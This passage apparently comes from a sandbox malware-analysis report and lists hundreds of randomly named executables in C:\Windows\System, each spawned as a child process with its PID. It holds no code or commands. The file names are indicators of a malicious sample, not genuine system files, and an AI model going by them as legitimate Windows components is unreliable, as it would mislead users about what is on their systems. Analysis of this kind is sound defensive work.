  C:\Windows\System\aBxAneq.exe
  2⤵
  PID:6088
- C:\Windows\System\klJDKJn.exe
  C:\Windows\System\klJDKJn.exe
  2⤵
  PID:6076
- C:\Windows\System\fVUviiL.exe
  C:\Windows\System\fVUviiL.exe
  2⤵
  PID:5100
- C:\Windows\System\dkDQRKL.exe
  C:\Windows\System\dkDQRKL.exe
  2⤵
  PID:2232
- C:\Windows\System\mfPwyPu.exe
  C:\Windows\System\mfPwyPu.exe
  2⤵
  PID:6184
- C:\Windows\System\hGLoODD.exe
  C:\Windows\System\hGLoODD.exe
  2⤵
  PID:6216
- C:\Windows\System\ZvXpaJX.exe
  C:\Windows\System\ZvXpaJX.exe
  2⤵
  PID:6296
- C:\Windows\System\wjnSdRN.exe
  C:\Windows\System\wjnSdRN.exe
  2⤵
  PID:6316
- C:\Windows\System\wkcqrrO.exe
  C:\Windows\System\wkcqrrO.exe
  2⤵
  PID:6360
- C:\Windows\System\gRxFhTO.exe
  C:\Windows\System\gRxFhTO.exe
  2⤵
  PID:6444
- C:\Windows\System\rGlgWau.exe
  C:\Windows\System\rGlgWau.exe
  2⤵
  PID:6508
- C:\Windows\System\SFYTkub.exe
  C:\Windows\System\SFYTkub.exe
  2⤵
  PID:6572
- C:\Windows\System\rgRcWph.exe
  C:\Windows\System\rgRcWph.exe
  2⤵
  PID:6612
- C:\Windows\System\LfSEpiC.exe
  C:\Windows\System\LfSEpiC.exe
  2⤵
  PID:6684
- C:\Windows\System\xCqEjnR.exe
  C:\Windows\System\xCqEjnR.exe
  2⤵
  PID:6736
- C:\Windows\System\YwBNmto.exe
  C:\Windows\System\YwBNmto.exe
  2⤵
  PID:6816
- C:\Windows\System\QoponAK.exe
  C:\Windows\System\QoponAK.exe
  2⤵
  PID:6848
- C:\Windows\System\jGMNiCl.exe
  C:\Windows\System\jGMNiCl.exe
  2⤵
  PID:6912
- C:\Windows\System\ixaxBPE.exe
  C:\Windows\System\ixaxBPE.exe
  2⤵
  PID:6984
- C:\Windows\System\tnhsbid.exe
  C:\Windows\System\tnhsbid.exe
  2⤵
  PID:7048
- C:\Windows\System\hICKBQw.exe
  C:\Windows\System\hICKBQw.exe
  2⤵
  PID:7100
- C:\Windows\System\mCxgILa.exe
  C:\Windows\System\mCxgILa.exe
  2⤵
  PID:7140
- C:\Windows\System\mLLZTyZ.exe
  C:\Windows\System\mLLZTyZ.exe
  2⤵
  PID:5448
- C:\Windows\System\Cbprcjo.exe
  C:\Windows\System\Cbprcjo.exe
  2⤵
  PID:2568
- C:\Windows\System\bLTVcJJ.exe
  C:\Windows\System\bLTVcJJ.exe
  2⤵
  PID:6268
- C:\Windows\System\qwmGGES.exe
  C:\Windows\System\qwmGGES.exe
  2⤵
  PID:6308
- C:\Windows\System\RbxJJZI.exe
  C:\Windows\System\RbxJJZI.exe
  2⤵
  PID:6336
- C:\Windows\System\FWBlqhC.exe
  C:\Windows\System\FWBlqhC.exe
  2⤵
  PID:6352
- C:\Windows\System\JQQAKSi.exe
  C:\Windows\System\JQQAKSi.exe
  2⤵
  PID:6456
- C:\Windows\System\mUhWIbb.exe
  C:\Windows\System\mUhWIbb.exe
  2⤵
  PID:6480
- C:\Windows\System\WdHhmxM.exe
  C:\Windows\System\WdHhmxM.exe
  2⤵
  PID:6536
- C:\Windows\System\niWViZf.exe
  C:\Windows\System\niWViZf.exe
  2⤵
  PID:6600
- C:\Windows\System\IPbhZOF.exe
  C:\Windows\System\IPbhZOF.exe
  2⤵
  PID:6664
- C:\Windows\System\bACwCnI.exe
  C:\Windows\System\bACwCnI.exe
  2⤵
  PID:6704
- C:\Windows\System\azjUino.exe
  C:\Windows\System\azjUino.exe
  2⤵
  PID:6728
- C:\Windows\System\fZXxnvl.exe
  C:\Windows\System\fZXxnvl.exe
  2⤵
  PID:6812
- C:\Windows\System\OISsXNP.exe
  C:\Windows\System\OISsXNP.exe
  2⤵
  PID:6888
- C:\Windows\System\LeHGchq.exe
  C:\Windows\System\LeHGchq.exe
  2⤵
  PID:6868
- C:\Windows\System\stqfypM.exe
  C:\Windows\System\stqfypM.exe
  2⤵
  PID:6952
- C:\Windows\System\WiidTiH.exe
  C:\Windows\System\WiidTiH.exe
  2⤵
  PID:7004
- C:\Windows\System\fUtolAc.exe
  C:\Windows\System\fUtolAc.exe
  2⤵
  PID:7084
- C:\Windows\System\EdlaQnR.exe
  C:\Windows\System\EdlaQnR.exe
  2⤵
  PID:7136
- C:\Windows\System\cDPKPCX.exe
  C:\Windows\System\cDPKPCX.exe
  2⤵
  PID:1208
- C:\Windows\System\FFUzJkk.exe
  C:\Windows\System\FFUzJkk.exe
  2⤵
  PID:6236
- C:\Windows\System\RmPhqjP.exe
  C:\Windows\System\RmPhqjP.exe
  2⤵
  PID:6348
- C:\Windows\System\nJsiRhD.exe
  C:\Windows\System\nJsiRhD.exe
  2⤵
  PID:6464
- C:\Windows\System\BsvAxEo.exe
  C:\Windows\System\BsvAxEo.exe
  2⤵
  PID:6624
- C:\Windows\System\NKKgnJJ.exe
  C:\Windows\System\NKKgnJJ.exe
  2⤵
  PID:6660
- C:\Windows\System\pXcxZot.exe
  C:\Windows\System\pXcxZot.exe
  2⤵
  PID:6712
- C:\Windows\System\praQqFi.exe
  C:\Windows\System\praQqFi.exe
  2⤵
  PID:6768
- C:\Windows\System\acSxtxw.exe
  C:\Windows\System\acSxtxw.exe
  2⤵
  PID:3896
- C:\Windows\System\uRNlQcp.exe
  C:\Windows\System\uRNlQcp.exe
  2⤵
  PID:6924
- C:\Windows\System\YSrIQqa.exe
  C:\Windows\System\YSrIQqa.exe
  2⤵
  PID:7028
- C:\Windows\System\fDohdGD.exe
  C:\Windows\System\fDohdGD.exe
  2⤵
  PID:7076
- C:\Windows\System\ksqpbgO.exe
  C:\Windows\System\ksqpbgO.exe
  2⤵
  PID:7156
- C:\Windows\System\YOEUmdw.exe
  C:\Windows\System\YOEUmdw.exe
  2⤵
  PID:6192
- C:\Windows\System\EdozESl.exe
  C:\Windows\System\EdozESl.exe
  2⤵
  PID:6396
- C:\Windows\System\SCIgymu.exe
  C:\Windows\System\SCIgymu.exe
  2⤵
  PID:6556
- C:\Windows\System\YcRMFhZ.exe
  C:\Windows\System\YcRMFhZ.exe
  2⤵
  PID:6696
- C:\Windows\System\mhGFdmZ.exe
  C:\Windows\System\mhGFdmZ.exe
  2⤵
  PID:6832
- C:\Windows\System\LNQmpOx.exe
  C:\Windows\System\LNQmpOx.exe
  2⤵
  PID:6996
- C:\Windows\System\NoZhTAh.exe
  C:\Windows\System\NoZhTAh.exe
  2⤵
  PID:5904
- C:\Windows\System\caYskhS.exe
  C:\Windows\System\caYskhS.exe
  2⤵
  PID:6416
- C:\Windows\System\apWluFg.exe
  C:\Windows\System\apWluFg.exe
  2⤵
  PID:6724
- C:\Windows\System\BPtCIrh.exe
  C:\Windows\System\BPtCIrh.exe
  2⤵
  PID:6156
- C:\Windows\System\qucPkem.exe
  C:\Windows\System\qucPkem.exe
  2⤵
  PID:7064
- C:\Windows\System\CiyFrgp.exe
  C:\Windows\System\CiyFrgp.exe
  2⤵
  PID:7172
- C:\Windows\System\nmAIrwk.exe
  C:\Windows\System\nmAIrwk.exe
  2⤵
  PID:7188
- C:\Windows\System\oMqQvHe.exe
  C:\Windows\System\oMqQvHe.exe
  2⤵
  PID:7228
- C:\Windows\System\TxtFQAv.exe
  C:\Windows\System\TxtFQAv.exe
  2⤵
  PID:7252
- C:\Windows\System\BblPADr.exe
  C:\Windows\System\BblPADr.exe
  2⤵
  PID:7284
- C:\Windows\System\kaepqEp.exe
  C:\Windows\System\kaepqEp.exe
  2⤵
  PID:7316
- C:\Windows\System\YIYpBSA.exe
  C:\Windows\System\YIYpBSA.exe
  2⤵
  PID:7348
- C:\Windows\System\ToghQhQ.exe
  C:\Windows\System\ToghQhQ.exe
  2⤵
  PID:7376
- C:\Windows\System\NETOtpP.exe
  C:\Windows\System\NETOtpP.exe
  2⤵
  PID:7416
- C:\Windows\System\DBDaNmQ.exe
  C:\Windows\System\DBDaNmQ.exe
  2⤵
  PID:7432
- C:\Windows\System\TbvIqyv.exe
  C:\Windows\System\TbvIqyv.exe
  2⤵
  PID:7460
- C:\Windows\System\greAOPN.exe
  C:\Windows\System\greAOPN.exe
  2⤵
  PID:7488
- C:\Windows\System\wAvhgeb.exe
  C:\Windows\System\wAvhgeb.exe
  2⤵
  PID:7516
- C:\Windows\System\nbpvOrL.exe
  C:\Windows\System\nbpvOrL.exe
  2⤵
  PID:7532
- C:\Windows\System\BSmNKQW.exe
  C:\Windows\System\BSmNKQW.exe
  2⤵
  PID:7552
- C:\Windows\System\eWHqFQB.exe
  C:\Windows\System\eWHqFQB.exe
  2⤵
  PID:7580
- C:\Windows\System\RWEGNYv.exe
  C:\Windows\System\RWEGNYv.exe
  2⤵
  PID:7612
- C:\Windows\System\GiYXEXA.exe
  C:\Windows\System\GiYXEXA.exe
  2⤵
  PID:7660
- C:\Windows\System\iAGYhur.exe
  C:\Windows\System\iAGYhur.exe
  2⤵
  PID:7688
- C:\Windows\System\dKfwKfD.exe
  C:\Windows\System\dKfwKfD.exe
  2⤵
  PID:7712
- C:\Windows\System\qSkpGxS.exe
  C:\Windows\System\qSkpGxS.exe
  2⤵
  PID:7752
- C:\Windows\System\AQpiMbX.exe
  C:\Windows\System\AQpiMbX.exe
  2⤵
  PID:7780
- C:\Windows\System\pcBykLY.exe
  C:\Windows\System\pcBykLY.exe
  2⤵
  PID:7812
- C:\Windows\System\wlkKpjr.exe
  C:\Windows\System\wlkKpjr.exe
  2⤵
  PID:7840
- C:\Windows\System\WcdEnKk.exe
  C:\Windows\System\WcdEnKk.exe
  2⤵
  PID:7868
- C:\Windows\System\AkKhqkZ.exe
  C:\Windows\System\AkKhqkZ.exe
  2⤵
  PID:7896
- C:\Windows\System\tLVkGmr.exe
  C:\Windows\System\tLVkGmr.exe
  2⤵
  PID:7936
- C:\Windows\System\TIYpWPu.exe
  C:\Windows\System\TIYpWPu.exe
  2⤵
  PID:7972
- C:\Windows\System\EEunMcJ.exe
  C:\Windows\System\EEunMcJ.exe
  2⤵
  PID:8000
- C:\Windows\System\dvMoult.exe
  C:\Windows\System\dvMoult.exe
  2⤵
  PID:8028
- C:\Windows\System\MKjFohd.exe
  C:\Windows\System\MKjFohd.exe
  2⤵
  PID:8044
- C:\Windows\System\cADoIYC.exe
  C:\Windows\System\cADoIYC.exe
  2⤵
  PID:8084
- C:\Windows\System\TuxtBFc.exe
  C:\Windows\System\TuxtBFc.exe
  2⤵
  PID:8100
- C:\Windows\System\NeaCRWk.exe
  C:\Windows\System\NeaCRWk.exe
  2⤵
  PID:8140
- C:\Windows\System\QhHdlrm.exe
  C:\Windows\System\QhHdlrm.exe
  2⤵
  PID:8168
- C:\Windows\System\VNowOUV.exe
  C:\Windows\System\VNowOUV.exe
  2⤵
  PID:5688
- C:\Windows\System\vVtikzD.exe
  C:\Windows\System\vVtikzD.exe
  2⤵
  PID:7216
- C:\Windows\System\MHyPPdA.exe
  C:\Windows\System\MHyPPdA.exe
  2⤵
  PID:7300
- C:\Windows\System\OQvnajU.exe
  C:\Windows\System\OQvnajU.exe
  2⤵
  PID:7392
- C:\Windows\System\zinQdxj.exe
  C:\Windows\System\zinQdxj.exe
  2⤵
  PID:7452
- C:\Windows\System\yqfZTWT.exe
  C:\Windows\System\yqfZTWT.exe
  2⤵
  PID:7508
- C:\Windows\System\OSHJzyt.exe
  C:\Windows\System\OSHJzyt.exe
  2⤵
  PID:7624
- C:\Windows\System\YvZtRMt.exe
  C:\Windows\System\YvZtRMt.exe
  2⤵
  PID:7652
- C:\Windows\System\HfMylZA.exe
  C:\Windows\System\HfMylZA.exe
  2⤵
  PID:7748
- C:\Windows\System\ZPHsUpu.exe
  C:\Windows\System\ZPHsUpu.exe
  2⤵
  PID:7828
- C:\Windows\System\wtwDglL.exe
  C:\Windows\System\wtwDglL.exe
  2⤵
  PID:7852
- C:\Windows\System\rOcoNWd.exe
  C:\Windows\System\rOcoNWd.exe
  2⤵
  PID:7968
- C:\Windows\System\fDWlRMM.exe
  C:\Windows\System\fDWlRMM.exe
  2⤵
  PID:8040
- C:\Windows\System\zQvMZNU.exe
  C:\Windows\System\zQvMZNU.exe
  2⤵
  PID:8096
- C:\Windows\System\ZvNBlSW.exe
  C:\Windows\System\ZvNBlSW.exe
  2⤵
  PID:8136
- C:\Windows\System\kDePOiP.exe
  C:\Windows\System\kDePOiP.exe
  2⤵
  PID:8176
- C:\Windows\System\WEyOUsn.exe
  C:\Windows\System\WEyOUsn.exe
  2⤵
  PID:7424
- C:\Windows\System\fmpZqHV.exe
  C:\Windows\System\fmpZqHV.exe
  2⤵
  PID:7576
- C:\Windows\System\EZxidoU.exe
  C:\Windows\System\EZxidoU.exe
  2⤵
  PID:7776
- C:\Windows\System\BpUhgAX.exe
  C:\Windows\System\BpUhgAX.exe
  2⤵
  PID:7932
- C:\Windows\System\FNJaDoD.exe
  C:\Windows\System\FNJaDoD.exe
  2⤵
  PID:7548
- C:\Windows\System\RXDdUgA.exe
  C:\Windows\System\RXDdUgA.exe
  2⤵
  PID:7308
- C:\Windows\System\ftLGTsF.exe
  C:\Windows\System\ftLGTsF.exe
  2⤵
  PID:7500
- C:\Windows\System\taGZEar.exe
  C:\Windows\System\taGZEar.exe
  2⤵
  PID:8024
- C:\Windows\System\oHFjMvJ.exe
  C:\Windows\System\oHFjMvJ.exe
  2⤵
  PID:7800
- C:\Windows\System\bPKonvz.exe
  C:\Windows\System\bPKonvz.exe
  2⤵
  PID:8200
- C:\Windows\System\gfNWLDJ.exe
  C:\Windows\System\gfNWLDJ.exe
  2⤵
  PID:8228
- C:\Windows\System\eQsNYFd.exe
  C:\Windows\System\eQsNYFd.exe
  2⤵
  PID:8256
- C:\Windows\System\DPaXPMH.exe
  C:\Windows\System\DPaXPMH.exe
  2⤵
  PID:8280
- C:\Windows\System\tsFVZOm.exe
  C:\Windows\System\tsFVZOm.exe
  2⤵
  PID:8312
- C:\Windows\System\bCoRRLl.exe
  C:\Windows\System\bCoRRLl.exe
  2⤵
  PID:8332
- C:\Windows\System\qmFStbM.exe
  C:\Windows\System\qmFStbM.exe
  2⤵
  PID:8360
- C:\Windows\System\NshLKMF.exe
  C:\Windows\System\NshLKMF.exe
  2⤵
  PID:8388
- C:\Windows\System\iqJyZyA.exe
  C:\Windows\System\iqJyZyA.exe
  2⤵
  PID:8428
- C:\Windows\System\hheSSSg.exe
  C:\Windows\System\hheSSSg.exe
  2⤵
  PID:8456
- C:\Windows\System\NLDvyeS.exe
  C:\Windows\System\NLDvyeS.exe
  2⤵
  PID:8484
- C:\Windows\System\YDVtHBL.exe
  C:\Windows\System\YDVtHBL.exe
  2⤵
  PID:8512
- C:\Windows\System\iAdKVvy.exe
  C:\Windows\System\iAdKVvy.exe
  2⤵
  PID:8540
- C:\Windows\System\EIcGtyx.exe
  C:\Windows\System\EIcGtyx.exe
  2⤵
  PID:8568
- C:\Windows\System\bCOvjLv.exe
  C:\Windows\System\bCOvjLv.exe
  2⤵
  PID:8596
- C:\Windows\System\aorblnT.exe
  C:\Windows\System\aorblnT.exe
  2⤵
  PID:8616
- C:\Windows\System\Fpmfqhh.exe
  C:\Windows\System\Fpmfqhh.exe
  2⤵
  PID:8652
- C:\Windows\System\KiRrpxd.exe
  C:\Windows\System\KiRrpxd.exe
  2⤵
  PID:8668
- C:\Windows\System\XjhuQsz.exe
  C:\Windows\System\XjhuQsz.exe
  2⤵
  PID:8696
- C:\Windows\System\zFgMQTC.exe
  C:\Windows\System\zFgMQTC.exe
  2⤵
  PID:8724
- C:\Windows\System\IBpcAgD.exe
  C:\Windows\System\IBpcAgD.exe
  2⤵
  PID:8760
- C:\Windows\System\ArFCJVn.exe
  C:\Windows\System\ArFCJVn.exe
  2⤵
  PID:8784
- C:\Windows\System\bOksXcP.exe
  C:\Windows\System\bOksXcP.exe
  2⤵
  PID:8816
- C:\Windows\System\bnDCaXu.exe
  C:\Windows\System\bnDCaXu.exe
  2⤵
  PID:8848
- C:\Windows\System\kAoZhiT.exe
  C:\Windows\System\kAoZhiT.exe
  2⤵
  PID:8876
- C:\Windows\System\vaeAiDf.exe
  C:\Windows\System\vaeAiDf.exe
  2⤵
  PID:8904
- C:\Windows\System\hMdkEWt.exe
  C:\Windows\System\hMdkEWt.exe
  2⤵
  PID:8932
- C:\Windows\System\wecikHJ.exe
  C:\Windows\System\wecikHJ.exe
  2⤵
  PID:8960
- C:\Windows\System\CPKCfSO.exe
  C:\Windows\System\CPKCfSO.exe
  2⤵
  PID:8988
- C:\Windows\System\yYfAqBi.exe
  C:\Windows\System\yYfAqBi.exe
  2⤵
  PID:9008
- C:\Windows\System\lbTRnSH.exe
  C:\Windows\System\lbTRnSH.exe
  2⤵
  PID:9044
- C:\Windows\System\QdsGpSv.exe
  C:\Windows\System\QdsGpSv.exe
  2⤵
  PID:9068
- C:\Windows\System\JbsgVAT.exe
  C:\Windows\System\JbsgVAT.exe
  2⤵
  PID:9088
- C:\Windows\System\nKeqQMN.exe
  C:\Windows\System\nKeqQMN.exe
  2⤵
  PID:9128
- C:\Windows\System\NdlvOCt.exe
  C:\Windows\System\NdlvOCt.exe
  2⤵
  PID:9156
- C:\Windows\System\fEVYGvJ.exe
  C:\Windows\System\fEVYGvJ.exe
  2⤵
  PID:9172
- C:\Windows\System\sDMUmKi.exe
  C:\Windows\System\sDMUmKi.exe
  2⤵
  PID:9212
- C:\Windows\System\zezWHew.exe
  C:\Windows\System\zezWHew.exe
  2⤵
  PID:8212
- C:\Windows\System\ywAwwUr.exe
  C:\Windows\System\ywAwwUr.exe
  2⤵
  PID:8300
- C:\Windows\System\DiCPVBf.exe
  C:\Windows\System\DiCPVBf.exe
  2⤵
  PID:8344
- C:\Windows\System\rzaENaS.exe
  C:\Windows\System\rzaENaS.exe
  2⤵
  PID:8444
- C:\Windows\System\OZObqXB.exe
  C:\Windows\System\OZObqXB.exe
  2⤵
  PID:8508
- C:\Windows\System\ObfqHjY.exe
  C:\Windows\System\ObfqHjY.exe
  2⤵
  PID:8536
- C:\Windows\System\drUeVjG.exe
  C:\Windows\System\drUeVjG.exe
  2⤵
  PID:8644
- C:\Windows\System\rWbGUKS.exe
  C:\Windows\System\rWbGUKS.exe
  2⤵
  PID:8708
- C:\Windows\System\FzEatVr.exe
  C:\Windows\System\FzEatVr.exe
  2⤵
  PID:8796
- C:\Windows\System\pBtHosX.exe
  C:\Windows\System\pBtHosX.exe
  2⤵
  PID:8872
- C:\Windows\System\eiZkONj.exe
  C:\Windows\System\eiZkONj.exe
  2⤵
  PID:8944
- C:\Windows\System\yRSvgvV.exe
  C:\Windows\System\yRSvgvV.exe
  2⤵
  PID:9060
- C:\Windows\System\HBLMkRg.exe
  C:\Windows\System\HBLMkRg.exe
  2⤵
  PID:9112
- C:\Windows\System\mAXruhT.exe
  C:\Windows\System\mAXruhT.exe
  2⤵
  PID:9152
- C:\Windows\System\yZVKQgz.exe
  C:\Windows\System\yZVKQgz.exe
  2⤵
  PID:8160
- C:\Windows\System\IBthWFi.exe
  C:\Windows\System\IBthWFi.exe
  2⤵
  PID:8420
- C:\Windows\System\zZgMdxs.exe
  C:\Windows\System\zZgMdxs.exe
  2⤵
  PID:8580
- C:\Windows\System\xpNwYdf.exe
  C:\Windows\System\xpNwYdf.exe
  2⤵
  PID:8680
- C:\Windows\System\cWnhhZZ.exe
  C:\Windows\System\cWnhhZZ.exe
  2⤵
  PID:8928
- C:\Windows\System\sACowwc.exe
  C:\Windows\System\sACowwc.exe
  2⤵
  PID:9036
- C:\Windows\System\YySbmLi.exe
  C:\Windows\System\YySbmLi.exe
  2⤵
  PID:9140
- C:\Windows\System\spODgAl.exe
  C:\Windows\System\spODgAl.exe
  2⤵
  PID:8632
- C:\Windows\System\JccoXmZ.exe
  C:\Windows\System\JccoXmZ.exe
  2⤵
  PID:8792
- C:\Windows\System\RKyQoFh.exe
  C:\Windows\System\RKyQoFh.exe
  2⤵
  PID:9020
- C:\Windows\System\Bfmslna.exe
  C:\Windows\System\Bfmslna.exe
  2⤵
  PID:8296
- C:\Windows\System\Gthlktg.exe
  C:\Windows\System\Gthlktg.exe
  2⤵
  PID:9244
- C:\Windows\System\nWdPCGw.exe
  C:\Windows\System\nWdPCGw.exe
  2⤵
  PID:9280
- C:\Windows\System\QzsjOxR.exe
  C:\Windows\System\QzsjOxR.exe
  2⤵
  PID:9332
- C:\Windows\System\iyCdFox.exe
  C:\Windows\System\iyCdFox.exe
  2⤵
  PID:9364
- C:\Windows\System\FctpwAx.exe
  C:\Windows\System\FctpwAx.exe
  2⤵
  PID:9392
- C:\Windows\System\oOqTcPM.exe
  C:\Windows\System\oOqTcPM.exe
  2⤵
  PID:9420
- C:\Windows\System\ooMzgWy.exe
  C:\Windows\System\ooMzgWy.exe
  2⤵
  PID:9452
- C:\Windows\System\lurtfXf.exe
  C:\Windows\System\lurtfXf.exe
  2⤵
  PID:9480
- C:\Windows\System\HVdziCt.exe
  C:\Windows\System\HVdziCt.exe
  2⤵
  PID:9500
- C:\Windows\System\iVRMbre.exe
  C:\Windows\System\iVRMbre.exe
  2⤵
  PID:9536
- C:\Windows\System\VwIJfeO.exe
  C:\Windows\System\VwIJfeO.exe
  2⤵
  PID:9568
- C:\Windows\System\ZiqpXYK.exe
  C:\Windows\System\ZiqpXYK.exe
  2⤵
  PID:9596
- C:\Windows\System\sqcKXHI.exe
  C:\Windows\System\sqcKXHI.exe
  2⤵
  PID:9624
- C:\Windows\System\utCJpKe.exe
  C:\Windows\System\utCJpKe.exe
  2⤵
  PID:9652
- C:\Windows\System\bxoJbwk.exe
  C:\Windows\System\bxoJbwk.exe
  2⤵
  PID:9680
- C:\Windows\System\EupKMge.exe
  C:\Windows\System\EupKMge.exe
  2⤵
  PID:9708
- C:\Windows\System\jDdsBiR.exe
  C:\Windows\System\jDdsBiR.exe
  2⤵
  PID:9736
- C:\Windows\System\jNwEJfw.exe
  C:\Windows\System\jNwEJfw.exe
  2⤵
  PID:9764
- C:\Windows\System\sFYAKyk.exe
  C:\Windows\System\sFYAKyk.exe
  2⤵
  PID:9796
- C:\Windows\System\tfFidxZ.exe
  C:\Windows\System\tfFidxZ.exe
  2⤵
  PID:9816
- C:\Windows\System\LCvnyhQ.exe
  C:\Windows\System\LCvnyhQ.exe
  2⤵
  PID:9832
- C:\Windows\System\JnwJbkD.exe
  C:\Windows\System\JnwJbkD.exe
  2⤵
  PID:9892
- C:\Windows\System\DhYkIgD.exe
  C:\Windows\System\DhYkIgD.exe
  2⤵
  PID:9920
- C:\Windows\System\kQyilpo.exe
  C:\Windows\System\kQyilpo.exe
  2⤵
  PID:9936
- C:\Windows\System\jkaGyRe.exe
  C:\Windows\System\jkaGyRe.exe
  2⤵
  PID:9956
- C:\Windows\System\xFHHMmg.exe
  C:\Windows\System\xFHHMmg.exe
  2⤵
  PID:9996
- C:\Windows\System\XRWgfXV.exe
  C:\Windows\System\XRWgfXV.exe
  2⤵
  PID:10032
- C:\Windows\System\oBAfppD.exe
  C:\Windows\System\oBAfppD.exe
  2⤵
  PID:10060
- C:\Windows\System\WMEukqF.exe
  C:\Windows\System\WMEukqF.exe
  2⤵
  PID:10096
- C:\Windows\System\ViXWiRk.exe
  C:\Windows\System\ViXWiRk.exe
  2⤵
  PID:10144
- C:\Windows\System\monmwpi.exe
  C:\Windows\System\monmwpi.exe
  2⤵
  PID:10180
- C:\Windows\System\cgqQRnT.exe
  C:\Windows\System\cgqQRnT.exe
  2⤵
  PID:10228
- C:\Windows\System\VQSZqwq.exe
  C:\Windows\System\VQSZqwq.exe
  2⤵
  PID:9240
- C:\Windows\System\djoJuIP.exe
  C:\Windows\System\djoJuIP.exe
  2⤵
  PID:9360
- C:\Windows\System\vUpiihh.exe
  C:\Windows\System\vUpiihh.exe
  2⤵
  PID:9412
- C:\Windows\System\paFKHXR.exe
  C:\Windows\System\paFKHXR.exe
  2⤵
  PID:9472
- C:\Windows\System\ROlAsXt.exe
  C:\Windows\System\ROlAsXt.exe
  2⤵
  PID:9564
- C:\Windows\System\zPbJkSM.exe
  C:\Windows\System\zPbJkSM.exe
  2⤵
  PID:9648
- C:\Windows\System\QFEFMOD.exe
  C:\Windows\System\QFEFMOD.exe
  2⤵
  PID:8564
- C:\Windows\System\wGHSsmA.exe
  C:\Windows\System\wGHSsmA.exe
  2⤵
  PID:9904
- C:\Windows\System\PwKCFFr.exe
  C:\Windows\System\PwKCFFr.exe
  2⤵
  PID:10004
- C:\Windows\System\snQFDST.exe
  C:\Windows\System\snQFDST.exe
  2⤵
  PID:10080
- C:\Windows\System\JNPPSTW.exe
  C:\Windows\System\JNPPSTW.exe
  2⤵
  PID:10172
- C:\Windows\System\csPSJII.exe
  C:\Windows\System\csPSJII.exe
  2⤵
  PID:9320
- C:\Windows\System\DBiVoNB.exe
  C:\Windows\System\DBiVoNB.exe
  2⤵
  PID:9508
- C:\Windows\System\oDPUGDm.exe
  C:\Windows\System\oDPUGDm.exe
  2⤵
  PID:9720
- C:\Windows\System\wslivtf.exe
  C:\Windows\System\wslivtf.exe
  2⤵
  PID:9912
- C:\Windows\System\pSTUbFZ.exe
  C:\Windows\System\pSTUbFZ.exe
  2⤵
  PID:10048
- C:\Windows\System\XoQfaXr.exe
  C:\Windows\System\XoQfaXr.exe
  2⤵
  PID:9380
- C:\Windows\System\gKLbmEF.exe
  C:\Windows\System\gKLbmEF.exe
  2⤵
  PID:9644
- C:\Windows\System\GLbrGbE.exe
  C:\Windows\System\GLbrGbE.exe
  2⤵
  PID:10156
- C:\Windows\System\VyCjgvA.exe
  C:\Windows\System\VyCjgvA.exe
  2⤵
  PID:10168
- C:\Windows\System\GxteeRs.exe
  C:\Windows\System\GxteeRs.exe
  2⤵
  PID:10284
- C:\Windows\System\zPeEadW.exe
  C:\Windows\System\zPeEadW.exe
  2⤵
  PID:10316
- C:\Windows\System\QTQRpkn.exe
  C:\Windows\System\QTQRpkn.exe
  2⤵
  PID:10336
- C:\Windows\System\BFijFtq.exe
  C:\Windows\System\BFijFtq.exe
  2⤵
  PID:10360
- C:\Windows\System\FMpjlXO.exe
  C:\Windows\System\FMpjlXO.exe
  2⤵
  PID:10384
- C:\Windows\System\WMKTkKi.exe
  C:\Windows\System\WMKTkKi.exe
  2⤵
  PID:10412
- C:\Windows\System\iUGUCak.exe
  C:\Windows\System\iUGUCak.exe
  2⤵
  PID:10452
- C:\Windows\System\YboOMpT.exe
  C:\Windows\System\YboOMpT.exe
  2⤵
  PID:10488
- C:\Windows\System\QcGhgZI.exe
  C:\Windows\System\QcGhgZI.exe
  2⤵
  PID:10520
- C:\Windows\System\EZrmUuw.exe
  C:\Windows\System\EZrmUuw.exe
  2⤵
  PID:10556
- C:\Windows\System\gbZhnmp.exe
  C:\Windows\System\gbZhnmp.exe
  2⤵
  PID:10572
- C:\Windows\System\dUYNSEv.exe
  C:\Windows\System\dUYNSEv.exe
  2⤵
  PID:10608
- C:\Windows\System\wEwEynE.exe
  C:\Windows\System\wEwEynE.exe
  2⤵
  PID:10628
- C:\Windows\System\ufqJdjF.exe
  C:\Windows\System\ufqJdjF.exe
  2⤵
  PID:10668
- C:\Windows\System\DeYjJtn.exe
  C:\Windows\System\DeYjJtn.exe
  2⤵
  PID:10696
- C:\Windows\System\jCLNJUM.exe
  C:\Windows\System\jCLNJUM.exe
  2⤵
  PID:10724
- C:\Windows\System\hLdYIoW.exe
  C:\Windows\System\hLdYIoW.exe
  2⤵
  PID:10752
- C:\Windows\System\LBQIOwF.exe
  C:\Windows\System\LBQIOwF.exe
  2⤵
  PID:10780
- C:\Windows\System\uYkTuWN.exe
  C:\Windows\System\uYkTuWN.exe
  2⤵
  PID:10812
- C:\Windows\System\wJwhEUW.exe
  C:\Windows\System\wJwhEUW.exe
  2⤵
  PID:10840
- C:\Windows\System\YhtBHkg.exe
  C:\Windows\System\YhtBHkg.exe
  2⤵
  PID:10868
- C:\Windows\System\LTJHBOO.exe
  C:\Windows\System\LTJHBOO.exe
  2⤵
  PID:10896
- C:\Windows\System\qeOoHnE.exe
  C:\Windows\System\qeOoHnE.exe
  2⤵
  PID:10928
- C:\Windows\System\YAfaJFD.exe
  C:\Windows\System\YAfaJFD.exe
  2⤵
  PID:10956
- C:\Windows\System\oQNtfFL.exe
  C:\Windows\System\oQNtfFL.exe
  2⤵
  PID:10984
- C:\Windows\System\SbAJPJy.exe
  C:\Windows\System\SbAJPJy.exe
  2⤵
  PID:11012
- C:\Windows\System\QDsZrsZ.exe
  C:\Windows\System\QDsZrsZ.exe
  2⤵
  PID:11040
- C:\Windows\System\hXEpEqN.exe
  C:\Windows\System\hXEpEqN.exe
  2⤵
  PID:11068
- C:\Windows\System\yhyzitf.exe
  C:\Windows\System\yhyzitf.exe
  2⤵
  PID:11100
- C:\Windows\System\LkmXLVL.exe
  C:\Windows\System\LkmXLVL.exe
  2⤵
  PID:11132
- C:\Windows\System\UslaDUI.exe
  C:\Windows\System\UslaDUI.exe
  2⤵
  PID:11156
- C:\Windows\System\HQraaVE.exe
  C:\Windows\System\HQraaVE.exe
  2⤵
  PID:11184
- C:\Windows\System\oNcUYsi.exe
  C:\Windows\System\oNcUYsi.exe
  2⤵
  PID:11200
- C:\Windows\System\ghqWZKZ.exe
  C:\Windows\System\ghqWZKZ.exe
  2⤵
  PID:11228
- C:\Windows\System\NVnniCt.exe
  C:\Windows\System\NVnniCt.exe
  2⤵
  PID:10256
- C:\Windows\System\eMtttVM.exe
  C:\Windows\System\eMtttVM.exe
  2⤵
  PID:10304
- C:\Windows\System\TogKsUo.exe
  C:\Windows\System\TogKsUo.exe
